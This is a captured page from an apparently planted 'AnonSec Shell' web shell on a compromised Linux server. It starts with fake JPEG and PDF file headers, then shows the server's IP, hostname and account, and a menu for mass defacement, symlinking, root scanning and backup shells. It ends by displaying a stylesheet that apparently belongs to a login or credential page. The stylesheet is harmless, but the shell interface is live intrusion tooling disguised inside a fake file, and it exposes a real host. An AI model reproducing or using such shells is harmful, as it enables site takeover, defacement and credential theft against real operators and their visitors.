ÿØÿà JFIF ÿþ; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY AnonSec Shell
AnonSec Shell
Server IP : 157.90.209.209  /  Your IP : 216.73.216.129   [ Reverse IP ]
Web Server : Apache
System : Linux hcomm124.dns-wk.info 4.18.0-553.64.1.el8_10.x86_64 #1 SMP Mon Jul 28 12:01:56 EDT 2025 x86_64
User : evidenciarevista ( 1049)
PHP Version : 7.2.34
Disable Function : exec,passthru,shell_exec,system
Domains : 216 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/evidenciarevista/www/jxs/renew/assets/css/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /home/evidenciarevista/www/jxs/renew/assets/css/styles.css
@import url("https://fonts.googleapis.com/css2?family=Montserrat:wght@300;400;500;600;700;800&display=swap");
* {
  margin: 0;
  padding: 0;
  box-sizing: border-box;
}

ul {
  list-style-type: none;
}

body {
  font-family: "Montserrat", sans-serif;
  min-height: 100vh;
  background-color: whitesmoke;
  display: flex;
  flex-direction: column;
  align-items: center;
  justify-content: center;
  background-image: linear-gradient(
      to bottom right,
      transparent,
      rgba(0, 255, 0, 0.2)
    ),
    linear-gradient(to top left, transparent, rgba(0, 0, 255, 0.2)),
    linear-gradient(to bottom left, transparent, rgba(255, 0, 0, 0.2)),
    linear-gradient(to top right, transparent, rgba(255, 255, 0, 0.2));
  background-position: top right, top left, bottom left, bottom right;
  background-repeat: no-repeat;
}

header {
  background-color: blue;
  padding: 20px;
  display: flex;
  width: 100%;
  justify-content: space-between;
  height: 60px;
}

header a {
  text-decoration: none;
  color: white;
}

main {
  padding: 20px;
  display: flex;
  flex-direction: column;
  align-items: center;
  justify-content: center;
  gap: 1rem;
  color: #333;
  background-color: white;
}

.main-head {
  display: flex;
  gap: 10px;
  align-items: center;
}

.main-body {
  display: flex;
  flex-direction: column;
  gap: 5px;
}

.main-body h3 {
  font-weight: 300;
  text-align: center;
  padding: 10px;
  /* background-color: white; */
}

.pdf {
  display: flex;
  gap: 10px;
  align-items: center;
  padding: 15px;
  background-color: rgba(0, 0, 255, 0.087);
  border-radius: 5px;
  width: 200px;
  margin: 15px;
  cursor: pointer;
}

main form {
  display: flex;
  flex-direction: column;
  gap: 20px;
  margin-top: 10px;
  position: relative;
}
main form span {
  position: absolute;
  right: 8px;
  color: darkgray;
  top: 14px;
  font-size: 0.6rem;
}

main form input {
  padding: 18px;
  border: 1px solid darkgray;
  outline: none;
}
main form input::placeholder {
  font-size: 1rem;
  letter-spacing: 1px;
}

main form input:focus {
  border: 1px solid blue;
}

main form button {
  padding: 18px;
  border: none;
  outline: none;
  cursor: pointer;
  background-color: blue;
  color: white;
  font-weight: 700;
  letter-spacing: 1px;
}

.terms {
  font-weight: 500;
  margin-top: 20px;
  text-align: justify;
  /* letter-spacing: 1px; */
}

body a {
  text-decoration: none;
  color: #333;
}

/* auth */
.pass1 {
  display: flex;
  flex-direction: column;
  gap: 1.5rem;
}
.pass-head {
  display: flex;
  align-items: center;
  gap: 10px;
}
.mail {
  display: flex;
  align-items: center;
}
.pass1 form {
  display: flex;
  flex-direction: column;
  gap: 1rem;
}
.pass1 form label {
  font-weight: 500;
  font-size: 1.1rem;
}
.pass1 form input {
  padding: 15px 0px;
  border: none;
  border-bottom: 1px solid darkgray;
  outline: none;
}
.pass1 form input::placeholder {
  font-weight: 200;
  letter-spacing: 1px;
  font-size: 1.1rem;
}
.pass1 form ul {
  list-style-type: none;
  display: flex;
  flex-direction: column;
  gap: 1rem;
}
.pass1 form ul li a {
  color: rgba(0, 0, 255, 0.945);
}

.pass1 form .btn {
  display: flex;
  flex-direction: row;
  align-self: flex-end;
}

.pass1 form button {
  background-color: blue;
  border: none;
  outline: none;
  padding: 10px 25px;
  margin-bottom: 20px;
  color: whitesmoke;
  font-weight: 400;
  border-radius: 5px;
  cursor: pointer;
}

#error {
  margin-top: 0;
}

/* queries */
@media screen and (min-width: 768px) {
  .main-head {
    display: flex;
    gap: 10px;
    align-items: center;
    justify-content: center;
  }
  body {
    display: grid;
    place-content: center;
    gap: 1.5rem;
  }
  main {
    width: 450px;
    box-shadow: 1px 2px 10px 4px rgba(0, 0, 0, 0.1);
    border-radius: 10px;
    padding-bottom: 30px;
    padding: 25px;
  }
  header {
    border-radius: 10px 10px 0 0;
  }
  body a {
    text-align: center;
  }
  .pass1 {
    width: 450px;
    box-shadow: 1px 2px 10px 4px rgba(0, 0, 0, 0.1);
    border-radius: 5px;
    padding-bottom: 30px;
    padding: 25px;
    background-color: white;
  }
}

#err {
  font-size: small;
  color: red;
}

Anon7 - 2022
AnonSec Team